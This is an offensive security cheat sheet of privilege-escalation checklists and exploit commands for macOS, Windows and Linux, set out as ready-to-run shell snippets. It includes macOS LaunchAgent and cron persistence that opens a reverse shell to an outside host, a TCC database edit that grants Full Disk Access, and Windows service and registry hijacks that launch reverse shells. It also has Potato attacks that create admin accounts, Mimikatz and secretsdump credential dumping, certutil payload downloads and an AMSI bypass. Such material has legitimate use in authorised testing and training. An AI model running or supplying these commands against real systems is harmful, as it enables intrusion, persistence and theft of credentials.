macOS PrivEsc Checklist
Shell
-
# ════════════════════════════════════════════════════════════════
# PHASE 1 — WHO AM I / SITUATIONAL AWARENESS
# ════════════════════════════════════════════════════════════════
# current user, UID, GID, and all group memberships
id
# macOS version and build — needed for CVE selection
sw_vers
# kernel version
uname -a
# check SIP (System Integrity Protection) status — if disabled, many more attacks possible
csrutil status
# environment variables — may expose credentials or interesting paths
env
# other users with login shells — potential lateral targets
dscl . list /Users | grep -v "^_"
# ════════════════════════════════════════════════════════════════
# PHASE 2 — SUDO → Linux-SUID-Sudo.md (same commands apply)
# ════════════════════════════════════════════════════════════════
# list what current user can run with sudo — the single most important check
sudo -l
# NOPASSWD entry → immediate root without a password
# sudo <binary> → check GTFOBins for that binary
# env_keep LD_PRELOAD → dylib hijack → macOS-Dylib-Hijack.md
# sudo ALL → instant root: sudo su -
# try sudo without a password
sudo -n whoami 2>/dev/null
# ════════════════════════════════════════════════════════════════
# PHASE 3 — SUID BINARIES
# ════════════════════════════════════════════════════════════════
# find all SUID binaries — compare against GTFOBins
find / -perm -4000 -type f 2>/dev/null
# macOS common SUID binaries (often exploitable in older versions):
# /usr/bin/sudo, /usr/bin/newgrp, /usr/libexec/security_authtrampoline
# ════════════════════════════════════════════════════════════════
# PHASE 4 — TCC BYPASS / PRIVACY PERMISSIONS → macOS-TCC-Bypass.md
# ════════════════════════════════════════════════════════════════
# check TCC database — which apps have sensitive permissions (FDA, screen recording, etc.)
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db "SELECT * FROM access" 2>/dev/null
# check system TCC database (requires root or SIP disabled)
sudo sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db "SELECT * FROM access" 2>/dev/null
# look for apps with Full Disk Access (kTCCServiceSystemPolicyAllFiles)
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \
"SELECT client FROM access WHERE service='kTCCServiceSystemPolicyAllFiles'" 2>/dev/null
# ════════════════════════════════════════════════════════════════
# PHASE 5 — LAUNCH DAEMONS / AGENTS → macOS-LaunchDaemon-Abuse.md
# ════════════════════════════════════════════════════════════════
# list all LaunchDaemons (run as root) — check if any plist or binary is writable
ls -la /Library/LaunchDaemons/
ls -la /System/Library/LaunchDaemons/
# list user LaunchAgents (run as current user on login)
ls -la ~/Library/LaunchAgents/
ls -la /Library/LaunchAgents/
# check write permissions on a daemon plist or its binary
ls -la /Library/LaunchDaemons/com.example.daemon.plist
plutil -p /Library/LaunchDaemons/com.example.daemon.plist # read the plist
ls -la /path/to/daemon/binary
# if plist or binary is writable → replace binary or modify ProgramArguments → macOS-LaunchDaemon-Abuse.md
# ════════════════════════════════════════════════════════════════
# PHASE 6 — DYLIB HIJACKING → macOS-Dylib-Hijack.md
# ════════════════════════════════════════════════════════════════
# find apps that load dylibs from writable locations (DYLD_LIBRARY_PATH, rpath abuse)
otool -L /Applications/SomeApp.app/Contents/MacOS/SomeApp 2>/dev/null
# check if any dylib path in the list is missing or writable
ls -la /usr/local/lib/missing.dylib 2>/dev/null
# check @rpath entries — if an earlier rpath dir is writable, drop a malicious dylib there
otool -l /Applications/SomeApp.app/Contents/MacOS/SomeApp | grep -A2 LC_RPATH
# ════════════════════════════════════════════════════════════════
# PHASE 7 — CRON JOBS / PERIODIC SCRIPTS
# ════════════════════════════════════════════════════════════════
# user crontab
crontab -l
# system cron
cat /etc/crontab 2>/dev/null
ls -la /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly 2>/dev/null
# check if any periodic script is writable
ls -la /etc/periodic/daily/
# use pspy equivalent for macOS — monitor new processes
# fs_usage -w -f filesys 2>/dev/null | grep -v dtrace (verbose, look for root processes)
# ════════════════════════════════════════════════════════════════
# PHASE 8 — STORED CREDENTIALS / KEYCHAIN
# ════════════════════════════════════════════════════════════════
# dump keychain items accessible to current user (prompts for password)
security dump-keychain -d login.keychain 2>/dev/null
# find items in the keychain
security find-generic-password -ga "ServiceName" 2>/dev/null
# bash/zsh history — may contain passwords passed as CLI arguments
cat ~/.bash_history ~/.zsh_history 2>/dev/null
# config files with credentials
find ~ /etc /usr/local -name "*.conf" -o -name "*.env" -o -name "*.plist" 2>/dev/null \
| xargs grep -li "password\|passwd\|secret\|token\|apikey" 2>/dev/null
# SSH private keys
find ~ -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" 2>/dev/null
# clipboard — may contain passwords if user recently copied one
pbpaste
# ════════════════════════════════════════════════════════════════
# PHASE 9 — RUNNING PROCESSES / INTERNAL SERVICES
# ════════════════════════════════════════════════════════════════
# processes running as root — look for exploitable services
ps aux | grep root | grep -v "\[" | grep -v grep
# listening ports not exposed externally
netstat -an | grep LISTEN
lsof -iTCP -sTCP:LISTEN -n -P 2>/dev/null
# identify the process behind an interesting port
lsof -i :<PORT>
# ════════════════════════════════════════════════════════════════
# PHASE 10 — GROUP MEMBERSHIP
# ════════════════════════════════════════════════════════════════
# check all groups — look for admin, wheel, staff, _developer
id
groups
# admin group → can use sudo for many commands (check sudo -l)
dscl . read /Groups/admin GroupMembership
# _developer group → Xcode debug privileges (may allow process injection)
dscl . read /Groups/_developer GroupMembership
# ════════════════════════════════════════════════════════════════
# PHASE 11 — CLIPBOARD / KEYLOG OPPORTUNITIES → macOS-Clipboard-Keylog.md
# ════════════════════════════════════════════════════════════════
# read current clipboard contents — useful for capturing recently copied passwords
pbpaste
# check if Accessibility permission is granted to any app (enables keylogging)
sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db \
"SELECT client FROM access WHERE service='kTCCServiceAccessibility'" 2>/dev/null
# ════════════════════════════════════════════════════════════════
# PHASE 12 — PERSISTENCE REVIEW → macOS-Persistence.md
# ════════════════════════════════════════════════════════════════
# check all user persistence locations for writable entries
ls -la ~/Library/LaunchAgents/
ls -la ~/Library/Application\ Support/*/
ls -la ~/.config/
# login items (GUI persistence)
osascript -e 'tell application "System Events" to get the name of every login item'
# ════════════════════════════════════════════════════════════════
# PHASE 13 — KERNEL / OS EXPLOITS → Linux-Kernel-Exploit.md
# ════════════════════════════════════════════════════════════════
# get exact macOS version for CVE lookup
sw_vers -productVersion
# notable macOS local privilege escalation CVEs:
# CVE-2021-30892 — shrootkit (SIP bypass via system_installd)
# CVE-2021-1782 — kernel race condition
# CVE-2020-9934 — TCC bypass via user-writable containers
# CVE-2019-8526 — launchd race condition
# check if local privesc tools detect anything
# macOS-specific: run sudo_killer, linPEAS with -a flag
# ════════════════════════════════════════════════════════════════
# PHASE 14 — AUTOMATED SCANNERS (run last — noisy)
# ════════════════════════════════════════════════════════════════
# linPEAS — works on macOS too, covers most checks above
./linpeas.sh
# check for misconfigured sudoers, LaunchDaemons, weak file permissions
find /Library/LaunchDaemons /etc/periodic -type f -writable 2>/dev/null
find /usr/local/bin /usr/local/lib -type f -writable 2>/dev/null
|
|
noPac-SamAccountName
|
|
mitm6-IPv6
|
macOS-TCC-Bypass
Shell
-
# Check SIP status
csrutil status
# Query TCC databases
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db "SELECT service, client FROM access;"
sudo sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db "SELECT * FROM access;"
# Modify TCC.db (only if SIP disabled) — grant FDA to Terminal
sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db "INSERT INTO access VALUES('kTCCServiceSystemPolicyAllFiles','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,0)"
|
|
macOS-Post-Exploitation
|
macOS-Persistence
Shell
-
# LaunchAgent (user-level, no sudo)
cat > ~/Library/LaunchAgents/com.evil.agent.plist << 'PLIST'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.evil.agent</string>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string><string>-c</string>
<string>bash -i >& /dev/tcp/10.10.10.21/4444 0>&1</string>
</array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
</dict>
</plist>
PLIST
launchctl load ~/Library/LaunchAgents/com.evil.agent.plist
# Cron persistence
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/10.10.10.21/4444 0>&1") | crontab -
# Login item via osascript
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/tmp/reverse.sh", hidden:true}'
|
|
macOS-LaunchDaemon-Abuse
|
|
macOS-Dylib-Hijack
|
|
macOS-Clipboard-Keylog
|
|
ZeroLogon
|
Windows PrivEsc Checklist
Shell
-
# ════════════════════════════════════════════════════════════════
# PHASE 1 — WHO AM I / SITUATIONAL AWARENESS
# ════════════════════════════════════════════════════════════════
# current user, domain membership, SID
whoami /all
# local groups — look for Administrators, Backup Operators, Remote Desktop Users
net localgroup
# check if domain-joined — if yes, pivot to AD attack surface
systeminfo | findstr /i "domain"
# OS version and patch level — needed for kernel exploit selection
systeminfo | findstr /i "os name\|os version\|hotfix"
# environment variables — may expose credentials, paths, or app config
set
# ════════════════════════════════════════════════════════════════
# PHASE 2 — TOKEN PRIVILEGES → Token-Impersonation.md / Windows-Potato-Attacks.md
# ════════════════════════════════════════════════════════════════
# list enabled token privileges — check for any of the below
whoami /priv
# SeImpersonatePrivilege → PrintSpoofer / RoguePotato / GodPotato → Windows-Potato-Attacks.md
# SeAssignPrimaryTokenPrivilege → same potato attacks
# SeBackupPrivilege → read any file, dump SAM/NTDS → Windows-Post-Exploitation.md
# SeRestorePrivilege → write any file, replace binaries
# SeDebugPrivilege → dump LSASS → Windows-Post-Exploitation.md
# SeTakeOwnershipPrivilege → take ownership of any object
# SeLoadDriverPrivilege → load a malicious kernel driver → Windows-Kernel-Exploit.md
# SeManageVolumePrivilege → write to any volume (shadow copy abuse)
# quick check — does SeImpersonatePrivilege appear?
whoami /priv | findstr /i "impersonate\|assignprimarytoken"
# ════════════════════════════════════════════════════════════════
# PHASE 3 — SERVICES → Windows-Service-Exploit.md
# ════════════════════════════════════════════════════════════════
# find unquoted service paths with spaces that auto-start (not in C:\Windows)
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """"
# check which services the current user can modify
accesschk.exe /accepteula -ucqv "Authenticated Users" * /svc 2>nul
accesschk.exe /accepteula -uwcqv sec_user * /svc 2>nul
# show full config of a suspicious service (binary path, run-as account)
sc qc VulnService
# check write permissions on service binary directories
icacls "C:\Program Files\SuspiciousApp"
# ════════════════════════════════════════════════════════════════
# PHASE 4 — REGISTRY → Windows-Registry-Exploit.md / Windows-AlwaysInstallElevated.md
# ════════════════════════════════════════════════════════════════
# AlwaysInstallElevated — both keys must be 1 for MSI to run as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# autorun programs — check if any executable is writable → Windows-Registry-Exploit.md
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# check write permission on an autorun binary path
icacls "C:\Path\To\AutorunApp.exe"
# ════════════════════════════════════════════════════════════════
# PHASE 5 — SCHEDULED TASKS → Windows-Registry-Exploit.md
# ════════════════════════════════════════════════════════════════
# list all scheduled tasks with their run-as user and executable path
schtasks /query /fo LIST /v | findstr /i "task name\|run as\|task to run"
# look for tasks running as SYSTEM whose script/binary is writable
icacls "C:\Path\To\ScheduledTask.ps1"
# ════════════════════════════════════════════════════════════════
# PHASE 6 — STORED CREDENTIALS → Windows-Post-Exploitation.md / DPAPI-Extraction.md
# ════════════════════════════════════════════════════════════════
# stored credentials in Windows Credential Manager — may contain plaintext passwords
cmdkey /list
# use stored cmdkey credentials without knowing the password
runas /savecred /user:DOMAIN\targetuser "cmd.exe /c whoami > C:\Temp\out.txt"
# search common credential files
dir /s /b %APPDATA%\*.txt %APPDATA%\*.xml %APPDATA%\*.ini 2>nul
findstr /si "password\|passwd\|pwd\|secret\|credential" C:\*.xml C:\*.ini C:\*.txt 2>nul
# unattended install files — often contain base64-encoded admin passwords
dir /s /b C:\sysprep.inf C:\sysprep\sysprep.xml C:\Windows\Panther\Unattend.xml 2>nul
# SAM database backup — crackable offline → Windows-Post-Exploitation.md
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
# DPAPI — browser passwords, vault creds → DPAPI-Extraction.md
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --dpapi
# ════════════════════════════════════════════════════════════════
# PHASE 7 — DLL HIJACKING → Windows-DLL-Hijack.md
# ════════════════════════════════════════════════════════════════
# find processes running as SYSTEM or high-integrity
tasklist /v | findstr /i "system\|administrator"
# use Procmon or PowerShell to find missing DLLs loaded by a privileged process
# look for "NAME NOT FOUND" results in directories writable by current user
# check if any directory in PATH is writable (DLL planting opportunity)
for %A in ("%path:;=";"%") do ( cmd /c icacls "%~A" 2>nul | findstr /i "Everyone\|BUILTIN\|Users" )
# ════════════════════════════════════════════════════════════════
# PHASE 8 — UAC BYPASS → Windows-UAC-Bypass.md
# ════════════════════════════════════════════════════════════════
# check UAC level — if not NotifyMe or higher, bypass may be possible
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
# check if current user is in local Administrators (medium integrity shell — bypass needed)
net localgroup Administrators | findstr /i "%USERNAME%"
# ════════════════════════════════════════════════════════════════
# PHASE 9 — INSTALLED SOFTWARE / KERNEL EXPLOITS → Windows-Kernel-Exploit.md
# ════════════════════════════════════════════════════════════════
# list installed software — look for vulnerable versions (e.g. old Splunk, TeamViewer)
wmic product get name,version
# missing patches — compare against known exploit list (MS16-032, CVE-2021-36934 HiveNightmare, etc.)
wmic qfe get hotfixid | sort
# quick check for HiveNightmare (CVE-2021-36934) — readable SAM by non-admin
icacls C:\Windows\System32\config\SAM | findstr /i "Users\|Everyone"
# ════════════════════════════════════════════════════════════════
# PHASE 10 — NETWORK / INTERNAL SERVICES
# ════════════════════════════════════════════════════════════════
# listening ports — internal services not exposed externally may be exploitable
netstat -ano | findstr "LISTENING"
# identify process behind an interesting port
tasklist /fi "pid eq <PID>"
# ARP table — discover other hosts on the network for pivoting
arp -a
# ════════════════════════════════════════════════════════════════
# PHASE 11 — AD-SPECIFIC (if domain-joined) → ACL-Abuse.md / BloodHound.md
# ════════════════════════════════════════════════════════════════
# check domain groups — are you in any privileged AD groups?
net user %USERNAME% /domain
# look for AD misconfigs via BloodHound collection
.\SharpHound.exe -c All --zip
# find AD ACL misconfigs with PowerView
Import-Module .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "$env:USERNAME"}
# ════════════════════════════════════════════════════════════════
# PHASE 12 — AUTOMATED SCANNERS (run last — noisy)
# ════════════════════════════════════════════════════════════════
# WinPEAS — comprehensive automated PrivEsc enumeration
.\winpeas.exe
# Seatbelt — targeted security checks (less noisy than WinPEAS)
.\Seatbelt.exe -group=all
# PowerUp — PowerShell PrivEsc checks (services, registry, DLLs)
Import-Module .\PowerUp.ps1
Invoke-AllChecks
|
Linux PrivEsc Checklist
Shell
-
# ════════════════════════════════════════════════════════════════
# PHASE 1 — WHO AM I / SITUATIONAL AWARENESS
# ════════════════════════════════════════════════════════════════
# current user, UID, GID, and all group memberships
id
# full login name and home directory
whoami && echo $HOME
# OS and kernel version — needed for CVE selection
uname -a
cat /etc/os-release
# check which shell and environment you have
echo $SHELL && env
# other users with a login shell — potential lateral targets
cat /etc/passwd | grep -v "nologin\|false"
# ════════════════════════════════════════════════════════════════
# PHASE 2 — SUDO → Linux-SUID-Sudo.md
# ════════════════════════════════════════════════════════════════
# list what the current user can run with sudo — the single most important check
sudo -l
# NOPASSWD entry → immediate root without a password
# sudo <binary> → check GTFOBins for that binary
# sudo ALL → instant root: sudo su -
# env_keep LD_PRELOAD → LD_PRELOAD hijack → LD-PRELOAD-Hijack.md
# try sudo without a password (may work if misconfigured)
sudo -n whoami 2>/dev/null
# ════════════════════════════════════════════════════════════════
# PHASE 3 — SUID / SGID BINARIES → Linux-SUID-Sudo.md
# ════════════════════════════════════════════════════════════════
# find all SUID binaries — compare each against GTFOBins
find / -perm -4000 -type f 2>/dev/null
# find all SGID binaries
find / -perm -2000 -type f 2>/dev/null
# interesting SUID binaries to check: find, bash, python, perl, nmap, vim, less, more,
# cp, mv, awk, env, tee, dd, cat, man, ftp, php, ruby, lua, node, git, screen
# ════════════════════════════════════════════════════════════════
# PHASE 4 — CAPABILITIES → Linux-Capabilities.md
# ════════════════════════════════════════════════════════════════
# find binaries with elevated Linux capabilities
getcap -r / 2>/dev/null
# dangerous capabilities to look for:
# cap_setuid → escalate to any UID → Linux-Capabilities.md
# cap_net_raw → raw socket access (sniff traffic)
# cap_dac_read_search → read any file (bypass DAC)
# cap_sys_ptrace → inject into any process
# cap_sys_admin → near-root — mount, namespace manipulation
# ════════════════════════════════════════════════════════════════
# PHASE 5 — CRON JOBS → Linux-Cron-Hijack.md
# ════════════════════════════════════════════════════════════════
# system-wide cron jobs — check for scripts writable by current user
cat /etc/crontab
ls -la /etc/cron.* /var/spool/cron/crontabs/ 2>/dev/null
# all cron-related files in common locations
find /etc/cron* /var/spool/cron* -type f 2>/dev/null
# check if a cron script is writable
ls -la /path/to/cron/script.sh
# watch for new processes spawned by cron (detects scripts not in crontab)
watch -n 1 "ps aux --sort=start_time | tail -20"
# use pspy to monitor processes without root (best tool for cron detection)
./pspy64
# ════════════════════════════════════════════════════════════════
# PHASE 6 — WRITABLE SERVICE FILES → Linux-Writable-Services.md
# ════════════════════════════════════════════════════════════════
# find systemd unit files writable by current user
find /etc/systemd /lib/systemd /usr/lib/systemd -type f -writable 2>/dev/null
# find service binaries/scripts that run as root and are writable
systemctl list-units --type=service --state=running
# for each interesting service:
systemctl cat <service-name> # shows the binary path
ls -la /path/to/service/binary
# ════════════════════════════════════════════════════════════════
# PHASE 7 — LD_PRELOAD HIJACK → LD-PRELOAD-Hijack.md
# ════════════════════════════════════════════════════════════════
# check if sudo preserves LD_PRELOAD (look for env_keep+=LD_PRELOAD in sudo -l output)
sudo -l | grep LD_PRELOAD
# if present: compile a malicious shared library and inject it via sudo
# see LD-PRELOAD-Hijack.md for full exploit chain
# ════════════════════════════════════════════════════════════════
# PHASE 8 — PATH HIJACKING / PYTHON LIBRARY HIJACK
# → Python-Library-Hijack.md
# ════════════════════════════════════════════════════════════════
# check PATH for writable directories at the front (attacker-controlled binary runs first)
echo $PATH
for dir in $(echo $PATH | tr ':' ' '); do ls -ld "$dir" 2>/dev/null; done
# find scripts run by root that call binaries without full path
# if you can write to a directory earlier in PATH, drop a malicious binary with the same name
# check python path for writable site-packages (python library hijack)
python3 -c "import sys; print('\n'.join(sys.path))"
find / -name "*.py" -writable 2>/dev/null | grep -v proc
# ════════════════════════════════════════════════════════════════
# PHASE 9 — WILDCARD INJECTION → Wildcard-Injection.md
# ════════════════════════════════════════════════════════════════
# look for cron or scripts running tar, rsync, chown, chmod with wildcards in writable dirs
grep -r "\*" /etc/cron* /var/spool/cron* 2>/dev/null | grep -E "tar|rsync|chown|chmod"
# if tar --wildcard or rsync used on a directory you can write to → inject --checkpoint-action
# see Wildcard-Injection.md for full technique
# ════════════════════════════════════════════════════════════════
# PHASE 10 — INTERESTING FILES / STORED CREDENTIALS
# ════════════════════════════════════════════════════════════════
# SSH private keys — look for id_rsa, id_ed25519, etc.
find / -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" 2>/dev/null
# bash history — may contain passwords passed as CLI arguments
cat ~/.bash_history
find / -name ".bash_history" -readable 2>/dev/null | xargs cat 2>/dev/null
# config files with credentials
find / -name "*.conf" -o -name "*.config" -o -name "*.env" 2>/dev/null | xargs grep -li "password\|passwd\|secret\|key" 2>/dev/null
# database credentials
find / -name "wp-config.php" -o -name "database.yml" -o -name ".env" 2>/dev/null | xargs grep -i "pass\|secret" 2>/dev/null
# check if /etc/shadow is readable (misconfigured permissions)
cat /etc/shadow 2>/dev/null
# check if /etc/passwd is writable — can add a root user with known password hash
ls -la /etc/passwd
# readable backup files that may contain hashes
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" 2>/dev/null | xargs ls -la 2>/dev/null
# ════════════════════════════════════════════════════════════════
# PHASE 11 — RUNNING PROCESSES / INTERNAL SERVICES
# ════════════════════════════════════════════════════════════════
# processes running as root — look for exploitable services or scripts
ps aux | grep root | grep -v "\[" | grep -v grep
# listening ports not exposed externally — internal services to exploit or tunnel to
ss -tlnp
netstat -tlnp 2>/dev/null
# port forward an internal service to your attack machine
# ssh -L 8080:127.0.0.1:8080 user@target (if SSH creds available)
# see Pivoting-Tunneling.md for more
# ════════════════════════════════════════════════════════════════
# PHASE 12 — SPECIAL GROUP MEMBERSHIP
# ════════════════════════════════════════════════════════════════
# check all groups of current user
id
# docker group → mount host filesystem into container → read/write as root → Docker-Escape.md
# lxd/lxc group → create privileged container → mount host FS → Docker-Escape.md
# disk group → direct access to raw disk device → read /etc/shadow without root
# adm group → read /var/log/* — may contain credentials or session data
# shadow group → read /etc/shadow directly
# video group → read framebuffer (screenshot the desktop)
# sudo/wheel group → sudo access
# if in docker group:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# if in disk group — read raw disk for sensitive files
debugfs /dev/sda1
# then: cat /etc/shadow
# if in lxd group → Docker-Escape.md for full technique
# ════════════════════════════════════════════════════════════════
# PHASE 13 — NFS → Linux-NFS-Abuse.md
# ════════════════════════════════════════════════════════════════
# check for NFS shares with no_root_squash (root on client = root on share)
cat /etc/exports 2>/dev/null
# list mountable NFS shares from the target
showmount -e 10.10.10.27
# ════════════════════════════════════════════════════════════════
# PHASE 14 — KERNEL EXPLOITS → Linux-Kernel-Exploit.md
# ════════════════════════════════════════════════════════════════
# get exact kernel version for CVE lookup
uname -r
# common kernel exploits to check (match against uname -r):
# DirtyPipe CVE-2022-0847 kernels 5.8–5.16
# DirtyCow CVE-2016-5195 kernels < 4.8.3
# PwnKit CVE-2021-4034 pkexec — distro-independent
# Baron Samedit CVE-2021-3156 sudo < 1.9.5p2
# check sudo version for Baron Samedit
sudo --version
# check pkexec for PwnKit (exists and is SUID = likely vulnerable on old systems)
ls -la /usr/bin/pkexec
# ════════════════════════════════════════════════════════════════
# PHASE 15 — AUTOMATED SCANNERS (run last — noisy)
# ════════════════════════════════════════════════════════════════
# LinPEAS — comprehensive automated PrivEsc enumeration
./linpeas.sh
# LinEnum — alternative automated enumeration
./LinEnum.sh
# LSE (Linux Smart Enumeration) — quieter, level 1 for quick scan
./lse.sh -l 1
# pspy — monitor process activity without root (best for spotting cron and root scripts)
./pspy64
|
Wordlist-Generation
-
# CeWL — scrape website for words
cewl http://10.10.10.27 -d 3 -m 5 -w wordlist.txt
cewl http://10.10.10.27 --with-numbers -w wordlist.txt
# Username generation from names
username-anarchy --select-format first.last,flast,f.last names.txt > users.txt
# Crunch — custom patterns
crunch 8 8 -t P@ss%%^^ -o passwords.txt
crunch 6 6 0123456789 -o pins.txt
# Common wordlist locations
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/big.txt
/usr/local/share/seclists/Discovery/Web-Content/big.txt
/usr/local/share/seclists/Usernames/xato-net-10-million-usernames.txt
|
|
Windows-UAC-Bypass
|
Windows-Service-Exploit
Shell
-
# ============================================================
# ENUMERATION — Find vulnerable services
# ============================================================
# Find unquoted service paths with auto start (excludes Windows paths and quoted paths)
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """"
# Check which services "Authenticated Users" can modify
accesschk.exe /accepteula -ucqv "Authenticated Users" * /svc
# Check specific service permissions for current user
accesschk.exe /accepteula -uwcqv sec_user VulnService
# Query service configuration (check binary path, start type, account)
sc qc VulnService
# Check file/directory permissions with icacls
icacls "C:\Program Files\Vuln Service"
icacls "C:\Program Files\Vuln Service\app.exe"
# ============================================================
# EXPLOIT 1: Reconfigure service binary path
# ============================================================
# Overwrite the service binary path to point to your payload
sc config VulnService binpath= "C:\Temp\rev.exe"
# If the payload path has spaces, use escaped double quotes
sc config VulnService binpath= "\"C:\Temp\rev.exe\""
# Stop and start the service to trigger execution
sc stop VulnService
sc start VulnService
# Alternative: use net commands
net stop VulnService
net start VulnService
# If you can't restart the service, reboot the machine
shutdown /r /t 0
# ============================================================
# EXPLOIT 2: Unquoted service path exploitation
# ============================================================
# If service path is: C:\Program Files\Vuln Service\app.exe
# Windows tries these in order:
# C:\Program.exe
# C:\Program Files\Vuln.exe
# C:\Program Files\Vuln Service\app.exe
# Drop payload at a writable location in the search order
copy C:\Temp\rev.exe "C:\Program Files\Vuln.exe"
# Or if C:\ is writable
copy C:\Temp\rev.exe "C:\Program.exe"
# Restart the service
sc stop VulnService
sc start VulnService
# ============================================================
# EXPLOIT 3: Direct binary replacement
# ============================================================
# If you have write access to the service executable itself
move "C:\Program Files\Vuln Service\app.exe" "C:\Program Files\Vuln Service\app.exe.bak"
copy C:\Temp\rev.exe "C:\Program Files\Vuln Service\app.exe"
sc stop VulnService
sc start VulnService
# If you can't restart, reboot
shutdown /r /t 0
# ============================================================
# EXPLOIT 4: AutoRun program replacement
# ============================================================
# Find programs that run automatically on login
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check if the autorun executable is writable
icacls "C:\Program Files\AutoRunApp\app.exe"
accesschk.exe /accepteula -wvu "C:\Program Files\AutoRunApp\app.exe"
# Replace with reverse shell
copy /Y C:\Temp\rev.exe "C:\Program Files\AutoRunApp\app.exe"
# Wait for user login or reboot
shutdown /r /t 0
|
Windows-Registry-Exploit
Shell
-
# ============================================================
# ENUMERATION — Check registry permissions on services
# ============================================================
# Query the service configuration to see current binary path and account
sc qc regsvc
# Check registry key permissions — look for KEY_ALL_ACCESS or KEY_SET_VALUE
# If "Authenticated Users" or your user has write access, it's exploitable
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
# You can also check via reg itself
reg query HKLM\System\CurrentControlSet\Services\regsvc
# ============================================================
# EXPLOIT — Overwrite ImagePath and restart service
# ============================================================
# Overwrite the ImagePath to point to your reverse shell binary
reg add HKLM\System\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\reverse.exe /f
# Restart the service to trigger execution as SYSTEM
net start regsvc
# Alternative restart method
sc stop regsvc
sc start regsvc
# If you can't restart the service, reboot the machine
shutdown /r /t 0
|
Windows-Potato-Attacks
Shell
-
# Check for impersonation privileges
whoami /priv
# Look for: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
# --- JuicyPotato ---
JuicyPotato.exe -l 1337 -p C:\Temp\reverse.exe -t *
JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p cmd.exe -a "/c C:\Temp\reverse.exe" -t *
# --- PrintSpoofer (Windows 10 / Server 2016+) ---
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\Temp\reverse.exe"
# --- GodPotato ---
GodPotato.exe -cmd "C:\Temp\reverse.exe"
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net user hacker P@ssw0rd /add && net localgroup Administrators hacker /add"
# --- SweetPotato ---
SweetPotato.exe -p C:\Temp\reverse.exe
SweetPotato.exe -p cmd.exe -a "/c net user hacker P@ssw0rd /add"
# --- RoguePotato ---
# On attacker: set up socat redirect
socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.27:9999
# On target:
RoguePotato.exe -r 10.10.10.21 -e "C:\Temp\reverse.exe" -l 9999
|
Windows-Post-Exploitation
Shell
-
# --- Mimikatz credential dumping ---
# Enable debug privilege
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz.exe "privilege::debug" "lsadump::sam" exit
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:senshu.local /all /csv" exit
# --- Impacket secretsdump (from attacker) ---
impacket-secretsdump senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
impacket-secretsdump -just-dc senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# --- NetExec credential extraction ---
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --sam
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --lsa
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --dpapi
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --wifi
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --ntds
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' -M lsassy
nxc ldap 10.10.10.27 -u sec_user -p 'P@ssw0rd' --gmsa
# --- Offline SAM dump ---
# Save registry hives on target
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
# Dump offline with samdump2 (on attacker)
samdump2 SYSTEM SAM
# --- File transfer with certutil ---
certutil -urlcache -f http://10.10.10.21:8000/winpeas.exe C:\Temp\winpeas.exe
# --- Enumeration tools ---
# WinPEAS
.\winpeas.exe
# Seatbelt
.\Seatbelt.exe -group=all
# --- AMSI Bypass (run before loading tools in PowerShell) ---
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# --- AppLocker bypass paths (writable by default) ---
# C:\Windows\Tasks\
# C:\Windows\Temp\
